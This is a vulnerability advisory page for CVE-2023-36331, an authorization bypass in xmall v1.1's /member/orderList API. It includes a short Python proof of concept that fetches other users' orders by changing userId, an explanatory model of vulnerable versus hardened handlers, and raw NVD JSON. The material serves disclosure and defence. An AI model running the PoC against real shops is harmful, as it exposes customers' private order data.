Security Vulnerability Report
CVE-2023-36331 CVSS 8.2 HIGH

CVE-2023-36331

Published: 2026-01-12 20:15:53
Last Modified: 2026-01-22 21:09:43

Description

Incorrect access control in the /member/orderList API of xmall v1.1 allows attackers to arbitrarily access other users' order details via manipulation of the query parameter userId. The weakness is CWE-639 (Authorization Bypass Through User-Controlled Key): the endpoint selects whose orders to return from the client-supplied userId rather than from the identity bound to the caller's session. The assigned CVSS vector records PR:N, so no account is needed to exploit it, and C:H because the order data of every user is readable.

CVSS Details

CVSS Score
8.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:exrick:xmall:1.1:*:*:*:*:*:*:* - VULNERABLE
xmall v1.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# CVE-2023-36331 PoC - xmall v1.1 /member/orderList API Insecure Direct Object Reference
# Description: Incorrect access control in /member/orderList API allows attackers to
# access other users' order details via manipulation of userId parameter

target_url = "http://target-server.com/member/orderList"

# Attacker-controlled userId parameter to enumerate other users' orders
# Modify the userId value to access different users' order information
payload = {
    "userId": "1"  # Change this value to target different users
}

try:
    # Send request with manipulated userId parameter
    # No authentication required to exploit this vulnerability
    response = requests.get(target_url, params=payload, timeout=10)
    print(f"Status Code: {response.status_code}")
    print(f"Response: {response.text}")

    # If response contains order data for the specified userId,
    # the vulnerability is confirmed
    if response.status_code == 200 and "order" in response.text.lower():
        print("[+] Vulnerability confirmed! Order data leaked.")
        print(f"[+] Leaked data for userId: {payload['userId']}")
except requests.exceptions.RequestException as e:
    print(f"[-] Request failed: {e}")
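The following Python is an added example, not xmall's code and not part of the original advisory. It models the CWE-639 pattern behind this CVE on constructed sample data: a handler that takes the record owner from the query parameter userId (the behaviour the description attributes to /member/orderList) beside one that derives ownership from the server-side session, plus a differential check that confirms an IDOR by comparing an attacker session's view with the victim's own, which is more reliable than the substring match in the PoC above. ORDERS, SESSIONS, order_list_vulnerable, order_list_hardened, outcome and idor_exposed are all hypothetical names; the HTTP layer is omitted so the logic runs offline.

```python
# Added example (not xmall's code): models CWE-639 / IDOR on an order-list endpoint.
# ORDERS and SESSIONS are constructed sample data; every name here is hypothetical.

ORDERS = {
    1: [{"orderId": "A-1001", "total": 49.90}],
    2: [{"orderId": "B-2002", "total": 120.00}, {"orderId": "B-2003", "total": 8.50}],
}

# Server-side session store: opaque token -> authenticated user id.
SESSIONS = {"tok-alice": 1, "tok-bob": 2}


class Unauthorized(Exception):
    """No valid session was presented."""


class Forbidden(Exception):
    """Valid session, but the caller does not own the requested resource."""


def order_list_vulnerable(session_token, params):
    """Vulnerable pattern: the record owner is taken from the query string.

    The session is never consulted, so any caller, even one with no session
    at all, reads any user's orders by changing userId.
    """
    user_id = int(params.get("userId", 0))
    return ORDERS.get(user_id, [])


def order_list_hardened(session_token, params):
    """Hardened pattern: ownership comes from the authenticated principal.

    The user id is resolved from the server-side session. If the endpoint
    must keep accepting userId for compatibility, the value is honoured only
    when it matches the principal; a mismatch is rejected, not silently
    redirected to the caller's own data, so the probe is visible in logs.
    """
    owner = SESSIONS.get(session_token)
    if owner is None:
        raise Unauthorized()
    requested = params.get("userId")
    if requested is not None and int(requested) != owner:
        raise Forbidden()
    return ORDERS.get(owner, [])


def outcome(handler, token, params):
    """Run a handler and collapse the result into (status, body), HTTP-style."""
    try:
        return ("200", handler(token, params))
    except Unauthorized:
        return ("401", None)
    except Forbidden:
        return ("403", None)


def idor_exposed(fetch, victim_token, victim_id, attacker_token):
    """Differential check: does an attacker's session see the victim's own data?

    `fetch(token, params)` is the endpoint under test. The victim's view is
    taken through the victim's own session (the legitimate request carries
    the victim's userId); the attacker then asks for the same userId through
    a different session. A leak is declared only when the attacker receives
    exactly what the victim sees and that view is non-empty.
    """
    victim_view = fetch(victim_token, {"userId": str(victim_id)})
    if not victim_view:
        return False  # nothing to leak; inconclusive
    try:
        attacker_view = fetch(attacker_token, {"userId": str(victim_id)})
    except (Unauthorized, Forbidden):
        return False
    return attacker_view == victim_view


if __name__ == "__main__":
    # Victim is user 2 (tok-bob); attacker uses user 1's session, then none.
    for name, handler in (("vulnerable", order_list_vulnerable),
                          ("hardened", order_list_hardened)):
        for attacker in ("tok-alice", ""):
            leaked = idor_exposed(handler, "tok-bob", 2, attacker)
            print(f"{name:10s} attacker={attacker or '<no session>':12s} "
                  f"reads user 2's orders: {leaked}")
```

The differential check is also the shape a regression test for the fix should take: it must pass with a logged-in attacker and with no session at all, since the vector for this CVE records PR:N.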

References

https://github.com/Exrick/xmall/issues/100 (Exploit, Issue Tracking, Third Party Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2023-36331",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-12T20:15:52.523",
    "lastModified": "2026-01-22T21:09:43.433",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {"lang": "en", "value": "Incorrect access control in the /member/orderList API of xmall v1.1 allows attackers to arbitrarily access other users' order details via manipulation of the query parameter userId."},
      {"lang": "es", "value": "Control de acceso incorrecto en la API /member/orderList de xmall v1.1 permite a los atacantes acceder arbitrariamente a los detalles de pedidos de otros usuarios mediante la manipulación del parámetro de consulta userId."}
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N",
            "baseScore": 8.2,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 4.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-639"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:exrick:xmall:1.1:*:*:*:*:*:*:*",
                "matchCriteriaId": "E46154B1-2E17-432C-839B-1F13469BCA05"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/Exrick/xmall/issues/100",
        "source": "[email protected]",
        "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]
      }
    ]
  }
}